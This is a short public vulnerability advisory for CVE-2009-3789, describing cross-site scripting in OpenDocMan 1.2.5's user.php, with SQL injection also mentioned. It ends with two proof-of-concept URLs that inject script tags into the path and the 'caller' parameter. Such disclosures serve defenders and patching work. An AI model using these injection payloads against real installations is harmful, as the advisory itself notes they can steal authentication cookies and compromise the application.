OpenDocMan 1.2.5 - 'user.php' Cross-Site Scripting

Related Vulnerabilities: CVE-2009-3789  
Publish Date: 21 Oct 2009
Author: Amol Naik
                							

                source: http://www.securityfocus.com/bid/36777/info
         
OpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
         
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
         
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected. 

http://www.example.com/opendocman/user.php/"><script>alert(1)</script><"?aku=c3VibWl0PXNob3dwaWNrJnN0YXRlPTI=
http://www.example.com/opendocman/user.php?submit=Modify+User&item=2&caller=/opendocman/"><script>alert(123)</script><"